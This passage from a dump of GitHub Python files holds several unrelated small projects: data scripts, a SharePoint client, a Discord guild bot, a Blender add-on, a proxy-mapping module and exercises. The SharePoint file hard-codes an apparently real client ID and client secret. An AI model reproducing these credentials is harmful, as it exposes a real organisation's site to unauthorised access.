{}'.format(emp1.first, emp1.last, emp1.age, emp1.email))\nprint('Firstname: {} Lastname: {} Age: {} Email: {}'.format(emp2.first, emp2.last, emp2.age, emp2.email))\n\n\ntest = Employee.marks()\nprint(Employee.marks(test,12, 12, 12))\n\n\n# print(marks1.total)\n\n\n# emp1.name = 'san'\n# emp1.age = 23\n# emp1.phone = 23423423423\n# emp1.sal = 232323\n#\n#\n# emp2.name = 'sanjay'\n# emp2.age = 25\n# emp2.phone = 222222\n# emp2.sal = 50000\n#\n# print(emp1.name)\n# print(emp2.name)\n","repo_name":"sanjaykumardbdev/PhoneBook_backup","sub_path":"temp/z_test_py_class.py","file_name":"z_test_py_class.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"19095812663","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport json\nimport os\n\n#os.chdir(\"/home/wkg/complex_mapping\")\n\nbinding_affs = {}\nwith open(\"binding_affinity_data.csv\", \"r\") as handle:\n for line in handle:\n if not line.startswith(\"pdb_id\"):\n line = line.strip(\"\\n\").split(\",\")\n if line[12] != \"na\":\n binding_affs[line[0]] = line[12]\n \nplanarity = {}\nwith open(\"../planarity_results.csv\", \"r\") as handle:\n for line in handle:\n line = line.strip(\"\\n\").split(\",\")\n planarity[line[0]] = line[1]\n\nplanars = [binding_affs[comp] for comp in binding_affs if planarity[comp.upper()] == \"planar\"]\nnonplanars = [binding_affs[comp] for comp in binding_affs if planarity[comp.upper()] == \"nonplanar\"]\n\nwith open(\"binding_aff_by_planarity.csv\", \"w\") as out:\n out.write(\"planars,nonplanars\\n\")\n for idx, num in enumerate(planars):\n try:\n out.write(\",\".join([str(num), str(nonplanars[idx])]))\n out.write(\"\\n\")\n except IndexError:\n out.write(\",\".join([str(num), \"NA\"]))\n out.write(\"\\n\")\n","repo_name":"wigasper/ddi-planarity","sub_path":"analysis/binding_affinity_analysis.py","file_name":"binding_affinity_analysis.py","file_ext":"py","file_size_in_byte":1100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27603653283","text":"'''\nUsing python's request library, retrieve the HTML of the website you created\nthat now lives online at .github.io/\n\nBONUS: extend your python program so that it reads your original HTML file\n and returns True if the HTML from the response is the same as the\n the contents of the original HTML file.\n<<<<<<< HEAD\n'''\n\n\nimport requests\nimport os\n\nurl = \"https://lubcountcooper.github.io/my_sites/\"\nfile = \"/home/robert-jan/Documents/CodingNomads/Extras/my_sites/topics_overview.html\"\n\nwith os.fdopen(os.open(file, os.O_RDONLY), \"r\") as fin:\n original = fin.read()\n\ncontent = requests.get(url).text\n\nif original == content:\n print(True)\nelse:\n print(False)\n\n\n\n\n'''\n>>>>>>> 52cba3b05b42df043df4904b236c3e044812bb5f'''\n","repo_name":"LuckyLub/python-onsite","sub_path":"week_04/web_scraping/01_your_page.py","file_name":"01_your_page.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32999817582","text":"#!/usr/bin/env python3\n\nimport os\nimport sys\nimport codecs\nimport pickle\nimport pandas as pd\n\nimport Cas9Emulation as c9\n\n\nimport numpy as np\nfrom tensorflow.keras.models import load_model\n\n\ndef run_croton_predictions(guides):\n\n model = load_model('dockers/chopchop_li_2021/models/CROTON.h5') # load multitask model\n\n for i, guide in enumerate(guides):\n try:\n\n left_seq = guide.downstream5prim + guide.strandedGuideSeq[:-(len(guide.PAM) + 3)]\n left_seq = left_seq[-60:]\n\n right_seq = guide.strandedGuideSeq[-(len(guide.PAM) + 3):] + guide.downstream3prim\n right_seq = right_seq[:60]\n\n seq = left_seq + right_seq\n mid_seq = seq[30:90].decode(\"utf-8\")\n\n seq = one_hot_encode(mid_seq, 'ACGT')\n seq = np.reshape(seq, (1, 60, 4))\n cut_site = len(left_seq)\n\n pred_arr = model.predict(seq)\n pred = pd.DataFrame(pred_arr, columns = [\"del_freq\",\"1_bp_ins\",\"1_bp_del\",\"1_bp_fram\",\"2_bp_fram\",\"fram_freq\"])\n pred_stats = build_stats(pred)\n\n guide.repProfile = pred\n guide.repStats = pred_stats\n except ValueError:\n pass\n\n return guides\n\ndef one_hot_encode(seq, base_map):\n seq = seq.upper()\n mapping = dict(zip(base_map, range(4)))\n seq2 = [mapping[i] for i in seq]\n return np.eye(4)[seq2]\n\n\ndef build_stats(pred):\n\n del_freq = pred.loc[0,'del_freq']\n one_bp_ins = pred.loc[0,'1_bp_ins']\n one_bp_del = pred.loc[0,'1_bp_del']\n one_bp_fram = pred.loc[0,'1_bp_fram']\n two_bp_fram = pred.loc[0,'2_bp_fram']\n fram_freq = pred.loc[0, 'fram_freq']\n\n\n stats = {'Deletion frequency': del_freq.item()*100,\n '1 bp insertion probability': one_bp_ins.item()*100,\n '1 bp deletion probability': one_bp_del.item()*100,\n '1 bp frameshift frequency': one_bp_fram.item()*100,\n '2 bp frameshift frequency': two_bp_fram.item()*100,\n 'Frameshift frequency': fram_freq.item()*100,\n }\n return stats\n\ndef main():\n\n guides = []\n for t in c9.recv_tuples():\n guides.append(c9.tuple_to_cas9(t))\n\n scored_guides = run_croton_predictions(guides)\n\n if not scored_guides:\n exit(1)\n\n tuples = []\n for guide in scored_guides:\n tuples.append(c9.cas9_to_reduced_tuple(guide))\n\n # Encode & print the pickled tuples to STDOUT for the main script to catch.\n print(codecs.encode(pickle.dumps(tuples), 'base64').decode())\n\nif __name__ == \"__main__\":\n main()","repo_name":"JokingHero/p3_chopchop","sub_path":"dockers/chopchop_li_2021/run_croton_prediction.py","file_name":"run_croton_prediction.py","file_ext":"py","file_size_in_byte":2549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218259357","text":"from office365.runtime.auth.authentication_context import AuthenticationContext\nfrom office365.sharepoint.client_context import ClientContext\n\n\nclass AutorizacaoSharePoint:\n def __init__(self):\n self.id_autorizacao = None\n self.fornecedor = None\n self.numero_ordem = None\n self.transportador = None\n self.nome_motorista = None\n self.cpf = None\n self.rg = None\n self.cnh = None\n self.cavalo = None\n self.minicipio_cavalo = None\n self.carreta_1 = None\n self.municipio_carreta_1 = None\n self.carreta_2 = None\n self.municipio_carreta_2 = None\n self.tipo_veiculo = None\n self.procedimento_especial = None\n self.numero_eixos = None\n self.quantidade_ordens = None\n self.geradas = None\n self.data_inicio = None\n self.data_final = None\n self.data_execucao = None\n self.ativo = None\n self._id = None\n\n\ndef conn(numero_autorizacao):\n # Definindo parametros de conexão\n # ID e Senha criados pelo portal do sharepoint\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Chamando conexão com API Rest\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Puxando valores da lista\n lista_share = ctx.web.lists.get_by_title(\"Autorizações\")\n items = lista_share.get_items()\n ctx.load(items)\n ctx.execute_query()\n for item in items:\n _id = '{0}'.format(item.properties[\"ID\"])\n id_autorizacao = '{0}'.format(item.properties[\"NumAutoriza_x00e7__x00e3_o\"])\n if id_autorizacao == numero_autorizacao:\n id_autorizacao = '{0}'.format(item.properties[\"NumAutoriza_x00e7__x00e3_o\"])\n fornecedor = '{0}'.format(item.properties[\"Fornecedor\"]).strip()\n numero_ordem = '{0}'.format(item.properties[\"uwih\"]).strip()\n transportador = '{0}'.format(item.properties[\"r9n0\"]).strip()\n nome_motorista = '{0}'.format(item.properties[\"yecy\"]).strip()\n cpf = '{0}'.format(item.properties[\"jcvj\"]).strip()\n rg = '{0}'.format(item.properties[\"OData__x006d_vk6\"]).strip()\n cnh = '{0}'.format(item.properties[\"wwof\"]).strip()\n cavalo = '{0}'.format(item.properties[\"qbkd\"]).strip()\n cavalo = cavalo.replace('-', '')\n minicipio_cavalo = '{0}'.format(item.properties[\"hr0e\"]).strip()\n carreta_1 = '{0}'.format(item.properties[\"OData__x006d_cb0\"]).strip()\n carreta_1 = carreta_1.replace('-', '')\n if carreta_1.upper() == 'NONE':\n carreta_1 = ''\n\n municipio_carreta_1 = '{0}'.format(item.properties[\"a8fj\"]).strip()\n if municipio_carreta_1.upper() == 'NONE':\n municipio_carreta_1 = ''\n\n carreta_2 = '{0}'.format(item.properties[\"qdqz\"]).strip()\n carreta_2 = carreta_2.replace('-', '')\n if carreta_2.upper() == 'NONE':\n carreta_2 = ''\n\n municipio_carreta_2 = '{0}'.format(item.properties[\"OData__x0071_aw9\"]).strip()\n if municipio_carreta_2.upper() == 'NONE':\n municipio_carreta_2 = ''\n\n tipo_veiculo = '{0}'.format(item.properties[\"OData__x0065_op5\"])\n procedimento_especial = '{0}'.format(item.properties[\"i0dv\"])\n numero_eixos = '{0}'.format(item.properties[\"ahpu\"])\n quantidade_ordens = '{0}'.format(item.properties[\"hpzf\"])\n geradas = '{0}'.format(item.properties[\"OData__x006d_kv6\"])\n data_inicio = '{0}'.format(item.properties[\"OData__x0068_qp8\"])\n data_final = '{0}'.format(item.properties[\"OData__x0078_od1\"])\n data_execucao = '{0}'.format(item.properties[\"ejtw\"])\n ativo = '{0}'.format(item.properties[\"ATIVA\"])\n\n autoriazacao = AutorizacaoSharePoint()\n autoriazacao.id_autorizacao = id_autorizacao\n autoriazacao.fornecedor = fornecedor\n autoriazacao.numero_ordem = numero_ordem\n autoriazacao.transportador = transportador\n autoriazacao.nome_motorista = nome_motorista\n autoriazacao.cpf = cpf\n autoriazacao.rg = rg\n autoriazacao.cnh = cnh\n autoriazacao.cavalo = cavalo\n autoriazacao.minicipio_cavalo = minicipio_cavalo\n autoriazacao.carreta_1 = carreta_1\n autoriazacao.municipio_carreta_1 = municipio_carreta_1\n autoriazacao.carreta_2 = carreta_2\n autoriazacao.municipio_carreta_2 = municipio_carreta_2\n autoriazacao.tipo_veiculo = tipo_veiculo\n autoriazacao.procedimento_especial = procedimento_especial\n autoriazacao.numero_eixos = numero_eixos\n autoriazacao.quantidade_ordens = quantidade_ordens\n autoriazacao.geradas = geradas\n autoriazacao.data_inicio = data_inicio\n autoriazacao.data_final = data_final\n autoriazacao.data_execucao = data_execucao\n autoriazacao.ativo = ativo\n autoriazacao._id = _id\n return autoriazacao\n return None\n\n\ndef alterarDataExec(ID, DataExec):\n # Definindo parametros de conexão\n # ID e Senha criados pelo portal do sharepoint\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Chamando conexão com API Rest\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Puxando valores da lista\n listaShare = ctx.web.lists.get_by_title(\"Autorizações\")\n items = listaShare.get_items()\n ctx.load(items)\n ctx.execute_query()\n\n item = listaShare.get_item_by_id(ID)\n item.set_property('ejtw', DataExec)\n item.set_property('OData__x006d_kv6', '0')\n item.update()\n ctx.execute_query()\n\n\ndef alterarGeradas(ID, sumGeradas):\n # Definindo parametros de conexão\n # ID e Senha criados pelo portal do sharepoint\n app_settings = {\n 'url': 'https://usinacoruripe.sharepoint.com/sites/FaturamentoTorta',\n 'client_id': 'c74022f1-d1b5-47e3-913f-84d7a98cf032',\n 'client_secret': 'qfHtOWl6YieOhGAAavzuzUDvuf9pl2ZvD/0JSqvZhsQ='\n }\n\n # Chamando conexão com API Rest\n context_auth = AuthenticationContext(url=app_settings['url'])\n context_auth.acquire_token_for_app(client_id=app_settings['client_id'],\n client_secret=app_settings['client_secret'])\n ctx = ClientContext(app_settings['url'], context_auth)\n\n # Puxando valores da lista\n listaShare = ctx.web.lists.get_by_title(\"Autorizações\")\n items = listaShare.get_items()\n ctx.load(items)\n ctx.execute_query()\n\n item = listaShare.get_item_by_id(ID)\n item.set_property('OData__x006d_kv6', sumGeradas)\n item.update()\n ctx.execute_query()\n","repo_name":"kslima/bootTransp","sub_path":"conexao_share_point.py","file_name":"conexao_share_point.py","file_ext":"py","file_size_in_byte":7558,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22831423815","text":"import discord\r\nfrom discord.ext import commands\r\nfrom discord.ext.commands import Bot\r\nfrom discord.ext.commands import Context\r\nimport asyncio\r\nimport boto3\r\nfrom boto3.dynamodb.conditions import Key, Attr\r\n\r\nAccess_Key =\"\"\r\nSecret_Key = \"\"\r\n\r\nsession = boto3.Session(aws_access_key_id=Access_Key,\r\n aws_secret_access_key=Secret_Key,\r\n region_name='eu-west-2')\r\ndynamodb = session.resource('dynamodb')\r\nLisBot = commands.Bot(command_prefix='!')\r\nLisDB = dynamodb.Table('LisperroDB')\r\n\r\n\r\n@LisBot.event\r\nasync def on_ready():\r\n print(\"Ready\")\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def list(ctx):\r\n InfoRow = []\r\n response = LisDB.scan(\r\n ProjectionExpression= 'GuildImprovements, #l, #u',\r\n ExpressionAttributeNames={'#l': 'Current Level','#u': 'Upkeep'}\r\n )\r\n items = response['Items']\r\n for count, place in enumerate(items,1):\r\n if(place['GuildImprovements'] == 'Guild Hall'):\r\n InfoRow.append(str(count) + \". \" + place['GuildImprovements'] + \" - Lvl.\" + str(place['Current Level']) + \" - Total Upkeep: \" + str(place['Upkeep']) + \"gp\")\r\n else:\r\n InfoRow.append(str(count) + \". \" + place['GuildImprovements'] + \" - Lvl.\" + str(place['Current Level']) + \" - Upkeep: \" + str(place['Upkeep']) + \"gp\")\r\n message= \"\\n\".join(InfoRow)\r\n embededList = discord.Embed(title=\"List of Buildings\", description=message, color=0x35f4ff)\r\n await LisBot.say(embed = embededList)\r\n \r\n@LisBot.command(pass_context=True)\r\nasync def info(ctx, *,improvName):\r\n print(improvName)\r\n response = LisDB.query(\r\n KeyConditionExpression=Key('GuildImprovements').eq(improvName)\r\n )\r\n placeholder = response['Items']\r\n print(placeholder)\r\n if not placeholder:\r\n await LisBot.say(\"Im sorry, but I can't find that information.\")\r\n else:\r\n improvInfo = placeholder[0]\r\n contactName = improvInfo.get('ContactName','')\r\n infoBlock = discord.Embed(title=improvName,description=improvInfo.get('Description') ,color=0x123456)\r\n infoBlock.add_field(name=\"Current Level\",value=improvInfo.get('Current Level'),inline=True)\r\n if(len(contactName)>2):\r\n infoBlock.add_field(name=\"Practitioner\", value = contactName, inline=True)\r\n infoBlock.add_field(name=\"Effect Next Level\",value=improvInfo.get('Next Level Bonus'), inline=False)\r\n infoBlock.add_field(name=\"Gold Invested\",value=str(improvInfo.get('Gold Invested'))+'gp',inline=True)\r\n if('BaseUpkeep' in improvInfo):\r\n infoBlock.add_field(name=\"Total Upkeep\",value=str(improvInfo.get('Upkeep'))+'gp',inline=True)\r\n else:\r\n infoBlock.add_field(name=\"Upkeep\",value=str(improvInfo.get('Upkeep'))+'gp',inline=True)\r\n infoBlock.add_field(name=\"Gold For Next Level\",value=str(improvInfo.get('Gold For Next Level'))+'gp',inline=True)\r\n\r\n await LisBot.say(embed = infoBlock)\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def set(ctx,*, updateVal):\r\n print(ctx.message.author.top_role)\r\n top_role = ctx.message.author.top_role\r\n \r\n if(str(top_role) != \"GM\"): #Only those with the role of GM in discord should be able to access this infomation\r\n await LisBot.say(\"Sorry you do not have access to that information\")\r\n else:\r\n updateList = []\r\n for x in updateVal.split(','):\r\n updateList.append(x.strip())\r\n print(updateList)\r\n if(len(updateList) != 3):\r\n await LisBot.say(\"It seems you gave me the wrong amount of information.\")\r\n else:\r\n LisDB.update_item(\r\n Key={'GuildImprovements': updateList[0]},\r\n ConditionExpression = 'attribute_exists({})'.format(updateList[1]),\r\n UpdateExpression = 'SET {} = :val1'.format(updateList[1]),\r\n ExpressionAttributeValues={':val1': updateList[2]}\r\n )\r\n await LisBot.say(\"Thanks for the update.\")\r\n \r\n@LisBot.command(pass_context=True)\r\nasync def upkeep(ctx):\r\n response = LisDB.scan(\r\n ProjectionExpression='Upkeep, BaseUpkeep'\r\n )\r\n items = response['Items']\r\n print(items)\r\n upkeepSum = 0\r\n for x in items:\r\n if('BaseUpkeep' in x):\r\n upkeepSum = upkeepSum + x.get('BaseUpkeep',0)\r\n else:\r\n upkeepSum = upkeepSum + x.get('Upkeep')\r\n LisDB.update_item(\r\n Key={'GuildImprovements': 'Guild Hall'},\r\n UpdateExpression = 'SET Upkeep = :val1',\r\n ExpressionAttributeValues={':val1': upkeepSum}\r\n )\r\n await LisBot.say(\"I've gone over the accounts and updated the total upkeep.\\nTotal Upkeep: {}gp per month\".format(upkeepSum))\r\n\r\n@LisBot.command(pass_context=True)\r\nasync def rent(ctx, rentInput):\r\n print(ctx.message.author.display_name)\r\n usr_name = ctx.message.author.display_name\r\n print(rentInput)\r\n if(rentInput.isdigit() == False):\r\n await LisBot.say(\"The value entered is not a number\")\r\n elif(int(rentInput) == 0):\r\n await LisBot.say(\"0 is not an acceptable input\")\r\n else:\r\n currentEntry = usr_name + \": \" + rentInput +\"gp @ \" + str(ctx.message.timestamp) +\"\\n\"\r\n appendFile = open(\"rent_history.txt\", \"a\")\r\n appendFile.write(currentEntry)\r\n appendFile.close()\r\n readFile = open(\"rent_history.txt\", \"r\")\r\n paymentList = readFile.read()\r\n print(paymentList)\r\n response = LisDB.get_item(\r\n Key={'GuildImprovements' : 'Guild Hall'},\r\n ProjectionExpression='Upkeep, Rent'\r\n )\r\n totalRent = response['Item'].get('Upkeep')\r\n print(\"total = \" + str(totalRent))\r\n currentRent = int(response['Item'].get('Rent'))\r\n currentRent = currentRent + int(rentInput)\r\n print(\"current = \" + str(currentRent))\r\n LisDB.update_item(\r\n Key={'GuildImprovements' : 'Guild Hall'},\r\n UpdateExpression = 'SET Rent = :val1',\r\n ExpressionAttributeValues={':val1': str(currentRent)}\r\n )\r\n rentInfo = \"So far you have paid \" + str(currentRent) + \"gp out of a total of \" + str(totalRent) +\"gp\"\r\n rentBlock = discord.Embed(title=\"Summary of Rent\", description = rentInfo ,color=0x123456)\r\n rentBlock.add_field(name=\"Payment History\",value=paymentList,inline=True)\r\n await LisBot.say(embed = rentBlock)\r\n\r\nLisBot.run(\"\") #insert discord api key here","repo_name":"NGovani/Westmarches_Discord_bot","sub_path":"code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":6495,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39842916562","text":"# see https://medium.com/geekculture/creating-a-custom-panel-with-blenders-python-api-b9602d890663\n\nbl_info = {\n \"name\": \"Fur tools\",\n \"description\": \"Fur tools.\",\n \"author\": \"PVS\",\n \"version\": (1, 0),\n \"blender\": (3, 2, 0),\n \"location\": \"Properties > Object > My Awesome Panel\",\n \"warning\": \"\", # used for warning icon and text in add-ons panel\n \"wiki_url\": \"\",\n \"category\": \"Object\"\n }\n\nimport bpy\n\nfrom .select_twisted_quads_operator import SelectTwistedQuadsOperator\n\nfrom .copy_vertex_colors import CopyVertexColorsOperator\n\nfrom .recalc_normals_as_ref_object import RecalcNormalsAsRefObjectOperator\n\nfrom .gen_uv_by_colors_operator import GenUVByVertexColorsOperator\n\nfrom .recalc_anim_pivot_operator import RecalcAnimPivotOperator\n\nfrom .mask_fixed_operator import MaskFixedOperator\n\nfrom .copy_anim_operator import CopyAnimOperator\nfrom .ui import FurPanel\nfrom . import properties\nfrom .gen_fur2_operator import GenFurOperator\n\nCLASSES = [\n GenFurOperator,\n CopyAnimOperator,\n FurPanel,\n MaskFixedOperator,\n RecalcAnimPivotOperator,\n GenUVByVertexColorsOperator,\n RecalcNormalsAsRefObjectOperator,\n CopyVertexColorsOperator,\n SelectTwistedQuadsOperator\n]\n\ndef register():\n properties.register()\n for cls in CLASSES:\n bpy.utils.register_class(cls)\n\ndef unregister():\n properties.unregister()\n for cls in CLASSES:\n bpy.utils.unregister_class(cls)\n\nif __name__ == '__main__':\n register()","repo_name":"deep-ar/blender_fur_tools","sub_path":"__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"21842447917","text":"# MAy 16 2020 LeetCode May Challenge\n#\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def oddEvenList(self, head: ListNode) -> ListNode:\n '''\n 0 > 1->2->3->4->5\n odd 0 > 1->3->5->None\n even 0 > 2->4->None\n '''\n # two pointers for odd and even\n start1 = odd = ListNode(0)\n start2 = even = ListNode(0)\n while head:\n # pick up the odd/even nodes of the original LL\n odd.next = head\n even.next = head.next\n # move to the next node in the new odd/even LLs\n odd = odd.next\n even = even.next\n # move to the unassigned node of the original LL\n if even:\n head = head.next.next\n # end the loop if all nodes are assgined\n else:\n head = None\n # connect the odd LL to the even LL\n odd.next = start2.next\n return start1.next\n\n\n# test case\nn = 5\nhead = ListNode(1)\ncur = head\nfor i in range(n-1):\n cur.next = ListNode(i+2)\n cur = cur.next\n# solve it\nsol = Solution()\nans = sol.oddEvenList(head)\n# output the result\nLL = []\ncur = ans\nfor i in range(n):\n LL.append(cur.val)\n cur = cur.next\nprint(LL)\n","repo_name":"JieFrye/leetcode","sub_path":"LinkedList/OddEvenLinkedList.py","file_name":"OddEvenLinkedList.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"36739425901","text":"from utils import load_coefficients, save_coefficients\nimport cv2\nimport sys\nimport numpy as np\nimport platform\nfrom time import time\n\nTEST = platform.system()=='Windows'\n\nif TEST:\n location = 'photos\\\\'\n \nelse:\n location = '/home/pi/shared/'\n \n# Load coefficients\n#mtx, dist = load_coefficients('calibration_charuco.yml')\n\ntry:\n filename=sys.argv[1]\nexcept:\n pass \n \ndef create_opencv_image_from_stringio(img_stream, cv2_img_flag=0):\n img_stream.seek(0)\n img_array = np.asarray(bytearray(img_stream.read()), dtype=np.uint8)\n return cv2.imdecode(img_array, cv2_img_flag)\n\ndef undistort_file(filename,mapx, mapy):\n #mtx, dist = load_coefficients('calibration_charuco.yml')\n original = cv2.imread(f'calibration_test\\\\{filename}.jpeg')\n #dst = cv2.undistort(original, mtx, dist, None, mtx)\n dst=cv2.remap(original, mapx, mapy, cv2.INTER_LINEAR)\n cv2.imwrite(f'out\\\\{filename}.jpg', dst)\n cv2.imwrite(f'out\\\\{filename}_undist.jpg', original)\n\ndef undistort_image(img,filename,mapx, mapy):\n #mtx, dist = load_coefficients('calibration_charuco.yml')\n start = time()\n original = create_opencv_image_from_stringio(img,cv2.IMREAD_ANYCOLOR+cv2.IMREAD_ANYDEPTH)\n end = time()\n bytes_to_opencv = end-start\n #dst = cv2.undistort(original, mtx, dist, None, mtx)\n start = time()\n dst=cv2.remap(original, mapx, mapy, cv2.INTER_LINEAR)\n dst=cv2.resize(dst,None, fx = 1, fy = 0.93, interpolation = cv2.INTER_CUBIC)\n cv2.imwrite(f'{location}{filename}.jpg', dst)\n end = time()\n undistort_time = end-start\n print (\"undistort time: \", bytes_to_opencv,\"+\",undistort_time)\n #cv2.imwrite(f'{location}{filename}_raw.jpg',original)","repo_name":"Den-K-O/slab-photo-gui","sub_path":"undistort_charuco.py","file_name":"undistort_charuco.py","file_ext":"py","file_size_in_byte":1695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73447740853","text":"import os, requests, json, time\nfrom datetime import datetime\nfrom log_util import * \n\ndef load_config():\n config_file = 'config/config.json'\n config=open(config_file).read()\n return json.loads(config)\n\ndef getTargetPath(asset):\n target_full_path = config_json['path_to_download'] + asset\n return os.path.dirname(target_full_path), os.path.basename(target_full_path)\n\ndef logStatus(msg):\n s_log.info(msg)\n print (msg)\n\ndef get_timestamp():\n return datetime.now().strftime('%d %b %Y, %H:%M:%S')\n\n# Start \ns_time = get_timestamp()\n\n\n#Load config\nconfig_json = load_config()\n\n# Initialize loggers\nt_log = get_logger(config_json['trace_log'])\ne_log = get_logger(config_json['error_log'])\ns_log = get_output_handler(config_json['status_log'])\n\n# Initialize output file handler (uses log library)\ns_handle = get_output_handler(config_json['successful_assets'])\nf_handle = get_output_handler(config_json['failed_assets'])\n\n# Initialize variables\nassets_to_upload = []\ntotal = 0\nfailure = 0\n\ntry:\n\n for r, d, f in os.walk(config_json['source_dir']):\n for asset in f:\n t_log.info(r)\n t_log.info(asset)\n t_log.info(os.path.join(r, asset))\n assets_to_upload.append(os.path.join(r, asset))\n\n \nexcept Exception as e:\n e_log.error('Unexpected Error : '+str(e))\n\n\n# Report status\nlogStatus(\"\\nStatus:\\n=======\")\nlogStatus(\"Download start time : \"+s_time)\nlogStatus(\"Download completion time : \"+get_timestamp())\nlogStatus(\"Assets downloaded : \"+str(total - (failure)))\nif failure :\n logStatus(\"Download failed : \"+str(failure))\n logStatus(\"Check the logs at \"+config_json['error_log']+\" for error details\")\n\n","repo_name":"ashokkumarta/aem-dam-uploader","sub_path":"scripts/asset-upload.py","file_name":"asset-upload.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2057777850","text":"import threading\nimport time\n\nfrom . import __config as _c\nfrom . import __debounce as _d\nfrom . import __proxy as _p\nfrom . import __toast as _t\nfrom . import __utils as _u\n\nAUTO_MAP_ENABLED_ENTRY = \"auto_map\"\nAUTO_MAP_CONFIG_ENTRY = \"auto_map_config\"\nDEPRECATED_STR = \"配置失效\"\nNULL_KEY_REPLACEMENT = \"TlVMX0FTX0Y=\\u0000\"\n\n\ndef _saveConfig() -> None:\n replacedConfig = {\n (NULL_KEY_REPLACEMENT if k is None else k): v for k, v in _config.items()\n }\n _c.setGeneral(AUTO_MAP_CONFIG_ENTRY, replacedConfig)\n\n\ndef _loadConfig() -> dict[str | None, str | None]:\n replacedConfig: dict[str, str | None] = _c.getGeneral(AUTO_MAP_CONFIG_ENTRY, {})\n return {\n k if k != NULL_KEY_REPLACEMENT else None: v for k, v in replacedConfig.items()\n }\n\n\ndef _networkChangeDetection() -> None:\n global _lastSSID\n while _active:\n if not _u.isConnected():\n while _active:\n if _u.isConnected():\n break\n time.sleep(1)\n else:\n return\n ssid = _u.getSSID()\n if ssid != _lastSSID:\n applyMapping()\n _lastSSID = ssid\n time.sleep(1)\n\n\n@_d.debounce(2000)\ndef applyMapping(force: bool = False) -> None:\n global _lastSSID\n if force:\n _lastSSID = _u.getSSID()\n if _lastSSID in _config: # assuming is connected\n confName = _config[_lastSSID]\n if confName is not None and confName in _c.proxyConfig:\n _c.proxyConfig[confName].apply()\n _p.setEnabled(True)\n _t.toast(f\"根据网络 [{_lastSSID or '有线连接'}],使用配置 [{confName}]\")\n return\n _p.setEnabled(False)\n _t.toast(f\"根据网络 [{_lastSSID or '有线连接'}],已禁用代理\")\n\n\ndef _checkMapping() -> None:\n for ssid, confName in _config.items():\n if confName is not None and confName not in _c.proxyConfig:\n _config[ssid] = DEPRECATED_STR\n\n\ndef start(skipConf: bool = False) -> None:\n global _active, _thread\n if not skipConf:\n _c.setGeneral(AUTO_MAP_ENABLED_ENTRY, True)\n _active = True\n if not _thread.is_alive():\n _thread = threading.Thread(target=_networkChangeDetection, daemon=True)\n _thread.start()\n\n\ndef stop() -> None:\n global _active\n _c.setGeneral(AUTO_MAP_ENABLED_ENTRY, False)\n _active = False\n if _thread.is_alive():\n _thread.join()\n\n\ndef active() -> bool:\n return _active\n\n\ndef config() -> dict[str | None, str | None]:\n _checkMapping()\n return _config\n\n\ndef addMapping(ssid: str | None, confName: str | None) -> None:\n _config[ssid] = confName\n _saveConfig()\n\n\ndef removeMapping(ssid: str | None) -> None:\n _config.pop(ssid, None)\n _saveConfig()\n\n\n_active: bool = _c.getGeneral(AUTO_MAP_ENABLED_ENTRY, False)\n_lastSSID: str | None = _u.getSSID()\n_thread: threading.Thread = threading.Thread(\n target=_networkChangeDetection, daemon=True\n)\n_config: dict[str | None, str | None] = _loadConfig()\n\n_checkMapping()\nif _active:\n applyMapping()\n start(skipConf=True)\n","repo_name":"JUS4HR/proxy-control","sub_path":"App/__mapping.py","file_name":"__mapping.py","file_ext":"py","file_size_in_byte":3100,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"41246628597","text":"import json\nfrom pathlib import Path\n\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db import transaction\n\nfrom bookmarks.models import Bookmark, Row\n\n\ndef walk(texts, node, i=0, parent=None, path=None):\n if path is None:\n path = path or []\n indent = len(path)\n print('-', indent * \" \", node['enTitle'])\n parent = Bookmark.objects.create(\n parent=parent,\n ordinal=i,\n title=node['heTitle'],\n )\n i += 1\n if 'nodes' in node:\n for n in node['nodes']:\n i = walk(texts, n, i, parent, path + [n['enTitle']])\n else:\n d = texts\n for k in path:\n d = d[k]\n for row in d:\n Row.objects.create(\n bookmark=parent,\n ordinal=i,\n content=row,\n )\n 